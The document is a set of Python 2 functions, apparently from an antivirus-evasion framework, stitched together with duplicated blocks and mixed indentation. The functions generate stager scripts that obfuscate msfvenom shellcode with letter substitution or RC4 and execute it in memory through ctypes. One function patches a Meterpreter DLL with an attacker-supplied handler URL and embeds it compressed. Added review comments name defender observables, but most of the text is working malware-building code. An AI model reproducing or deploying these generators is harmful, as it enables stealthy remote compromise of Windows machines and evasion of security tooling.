        rand_ptr = randomizer.randomString()
        rand_buf = randomizer.randomString()
        rand_ht = randomizer.randomString()
        rand_decoded_letter = randomizer.randomString()
        rand_correct_letter = randomizer.randomString()
        rand_sub_scheme = randomizer.randomString()

        # Create Letter Substitution Scheme: encode_with_this -> decode_with_this.
        # The generated script builds the reverse table (decode -> encode).
        sub_scheme = string.maketrans(encode_with_this, decode_with_this)

        # Escaping Shellcode so it can be embedded in a string literal
        Shellcode = Shellcode.encode("string_escape")

        if self.required_options["inject_method"][0].lower() == "virtual":

            # Create Payload File -- VirtualAlloc path.  The emitted script allocates
            # RWX memory (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
            # copies the decoded buffer in with RtlMoveMemory, starts a thread at it
            # and blocks in WaitForSingleObject(-1 = INFINITE).  An RWX private
            # allocation followed by a thread start at that address inside the
            # interpreter process is the observable a defender can alert on.
            payload_code = 'import ctypes\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            # the swap is applied here, at generation time; the script reverses it
            payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                sub_scheme) + '\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            # bytearray gives from_buffer() the writable buffer it requires
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

            # optional wrapping by the project's pyherion crypter (defined elsewhere)
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = crypters.pyherion(payload_code)

            return payload_code

        else:

            # Additional random variable names
            # NOTE(review): rand_reverse_shell is assigned but never used.
            rand_reverse_shell = randomizer.randomString()
            rand_memory_shell = randomizer.randomString()
            rand_shellcode = randomizer.randomString()

            # Create Payload File -- any inject_method other than "virtual" lands
            # here: the decoded bytes go into a ctypes string buffer that is cast to
            # a CFUNCTYPE(c_void_p) and called directly on the current thread.
            payload_code = 'from ctypes import *\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                sub_scheme) + '\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
            payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
            payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
            # note: no trailing newline on the last emitted line, unlike the branch above
            payload_code += rand_shellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = crypters.pyherion(payload_code)

            return payload_code
    def generate(self):
        """Build a Python stager that embeds a patched metsrv DLL and return its source.

        The DLL is read from veil.METASPLOIT_PATH, patched in place (header stub,
        User-Agent, transport name, handler URL, two timeouts), compressed and
        base64-encoded by helpers.deflate, and written into a generated script
        that inflates it at run time and executes it through a ctypes function
        cast.  Unlike the other generators on this page there is no inject_method
        switch here, the transport is plain HTTP, and the crypter option key is
        "use_encrypter".  Python 2 only: the DLL image is handled as a str.

        Raises:
            IOError: if the metsrv path cannot be opened.
            ValueError: from str.index if any patch marker is missing from the DLL.
        """
        
        metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
        
        # NOTE(review): open/read/close without try/finally -- a with-block would
        # release the handle if read() raised.
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll: overwrite len(s) bytes
        # of dll starting at ind.  No bounds check; if ind + len(s) runs past the
        # end, the result is simply dll[:ind] + s.
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header: the first 48 bytes of the image (starting
        # at the "MZ" signature, \x4d\x5a) are replaced with this hard-coded stub.
        # Bytes 15-16 (\x37\x15) differ from the stub used by the other meterpreter
        # generators on this page (\xb0\x0e) -- presumably an offset specific to
        # the DLL build this generator targets; confirm before reusing.

        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
        headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string.  This value is constant across
        # every payload this module produces, which makes it a stable network
        # signature for defenders.
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL: the marker is overwritten with the plain-HTTP transport name.
        # The replacement is 2 bytes longer than the 25-byte token searched for, so
        # it also overwrites the 2 bytes following the token -- presumably padding
        # in the DLL, but verify against its layout.
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler.  The DLL carries a 264-byte
        # placeholder ("https://" + 256 X's); the http:// string assembled here is
        # written over its start and NUL-terminated, leaving the remaining X's in
        # place.  Nothing checks that urlString fits inside the placeholder.
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration-timeout marker (0xb64be661) with 604800 seconds
        # (7 days).  NOTE(review): the original comment claimed 300; the value
        # actually written is 604800.
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication-timeout marker (0xaf79257f) with 300 seconds
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll.  helpers.deflate is defined elsewhere;
        # judging by the inflate routine emitted below (base64 decode, then
        # zlib.decompress with wbits=-15) it returns base64 text of a raw-deflate
        # stream -- confirm.
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # doing void * cast: the emitted script inflates the DLL into a str, casts
        # that buffer to a CFUNCTYPE(c_void_p) and calls it on the current thread.
        payloadCode += "from ctypes import *\nimport base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()

        # deflate function (emitted inflate helper): base64 decode, then raw
        # inflate -- wbits -15 means no zlib header/trailer.
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

        # re-drawn so the module-level name differs from the one used inside the helper
        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()
        
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
        
        # optional wrapping by the project's pyherion crypter (defined elsewhere);
        # note the option key is "use_encrypter" here, not "use_pyherion"
        if self.required_options["use_encrypter"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
<doc_update>
    def generate(self):
        """Build the Python stager source for this payload and return it as a str.

        The msfvenom shellcode is RC4-encrypted (PyCrypto's Crypto.Cipher.ARC4,
        imported elsewhere) with a fresh 8-character key and embedded,
        string_escape'd, in a generated script that carries the same key in
        cleartext, decrypts the buffer and executes it through ctypes.  Because
        key and ciphertext travel together this only obscures the on-disk bytes;
        it provides no confidentiality.  required_options["inject_method"]
        selects the execution path and required_options["use_pyherion"] == "y"
        wraps the result in crypters.pyherion.  Python 2 only ("string_escape").
        """
        if self.required_options["inject_method"][0].lower() == "virtual":

            # Generate Shellcode Using msfvenom (self.shellcode is configured elsewhere)
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names for the emitted script
            # (randomizer.randomString / randomKey come from the surrounding project)
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()

            # Set IV Value and ARC Key.
            # NOTE(review): iv is written into the generated script but never read
            # there or here -- RC4 is a stream cipher with no IV, so iv and RandIV
            # are dead weight.
            iv = randomizer.randomKey(8)
            ARCKey = randomizer.randomKey(8)

            # Create ARC4 (RC4) object and encrypt our payload.  (The original
            # comment said "DES"; the cipher used is ARC4.)
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            # The emitted script: key in cleartext, ciphertext string_escape'd,
            # decrypt into a bytearray (from_buffer needs a writable buffer), then
            # VirtualAlloc RWX (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
            # PAGE_EXECUTE_READWRITE), RtlMoveMemory, CreateThread and
            # WaitForSingleObject(-1 = INFINITE).  An RWX private allocation
            # followed by a thread start at that address inside the interpreter
            # process is the observable a defender can alert on.
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            # optional wrapping by the project's pyherion crypter (defined elsewhere)
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Any inject_method other than "virtual" lands here.  NOTE(review): the
            # shellcode, names, key and encryption steps duplicate the branch above
            # and could be hoisted ahead of the if.
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()
            RandShellcode = randomizer.randomString()
            # NOTE(review): RandReverseShell is assigned but never used; RandPtr,
            # RandBuf and RandHt are also unused on this path.
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()

            # Set IV Value and ARC Key (iv unused -- see the branch above)
            iv = randomizer.randomKey(8)
            ARCKey = randomizer.randomKey(8)

            # Create ARC4 (RC4) object and encrypt our payload
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            # The emitted script decrypts into a str, wraps it in a ctypes string
            # buffer, casts that to a CFUNCTYPE(c_void_p) and calls it on the
            # current thread.
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            # note: no trailing newline on the last emitted line, unlike the branch above
            PayloadCode += RandShellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
	def generate(self):
		"""Build the Python stager source for this payload and return it as a str.

		The msfvenom shellcode is RC4-encrypted (PyCrypto's Crypto.Cipher.ARC4,
		imported elsewhere) with a fresh 8-character key and embedded,
		string_escape'd, in a generated script that carries the same key in
		cleartext, decrypts the buffer and executes it through ctypes.  Because
		key and ciphertext travel together this only obscures the on-disk bytes;
		it provides no confidentiality.  required_options["inject_method"]
		selects the execution path and required_options["use_pyherion"] == "y"
		wraps the result in crypters.pyherion.  Python 2 only ("string_escape").
		"""
		if self.required_options["inject_method"][0].lower() == "virtual":
		
			# Generate Shellcode Using msfvenom (self.shellcode is configured elsewhere)
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names for the emitted script
			# (randomizer.randomString / randomKey come from the surrounding project)
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
				
			# Set IV Value and ARC Key.
			# NOTE(review): iv is written into the generated script but never read
			# there or here -- RC4 is a stream cipher with no IV, so iv and RandIV
			# are dead weight.
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# Create ARC4 (RC4) object and encrypt our payload.  (The original
			# comment said "DES"; the cipher used is ARC4.)
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			# The emitted script: key in cleartext, ciphertext string_escape'd,
			# decrypt into a bytearray (from_buffer needs a writable buffer), then
			# VirtualAlloc RWX (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
			# PAGE_EXECUTE_READWRITE), RtlMoveMemory, CreateThread and
			# WaitForSingleObject(-1 = INFINITE).  An RWX private allocation
			# followed by a thread start at that address inside the interpreter
			# process is the observable a defender can alert on.
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'import ctypes\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
			PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
			PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
			PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
		
			# optional wrapping by the project's pyherion crypter (defined elsewhere)
			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode

		else:
			# Any inject_method other than "virtual" lands here.  NOTE(review): the
			# shellcode, names, key and encryption steps duplicate the branch above
			# and could be hoisted ahead of the if.
			# Generate Shellcode Using msfvenom
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
			RandShellcode = randomizer.randomString()
			# NOTE(review): RandReverseShell is assigned but never used; RandPtr,
			# RandBuf and RandHt are also unused on this path.
			RandReverseShell = randomizer.randomString()
			RandMemoryShell = randomizer.randomString()
				
			# Set IV Value and ARC Key (iv unused -- see the branch above)
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# Create ARC4 (RC4) object and encrypt our payload
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			# The emitted script decrypts into a str, wraps it in a ctypes string
			# buffer, casts that to a CFUNCTYPE(c_void_p) and calls it on the
			# current thread.
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'from ctypes import *\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
			PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
			PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
			# note: no trailing newline on the last emitted line, unlike the branch above
			PayloadCode += RandShellcode + '()'

			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode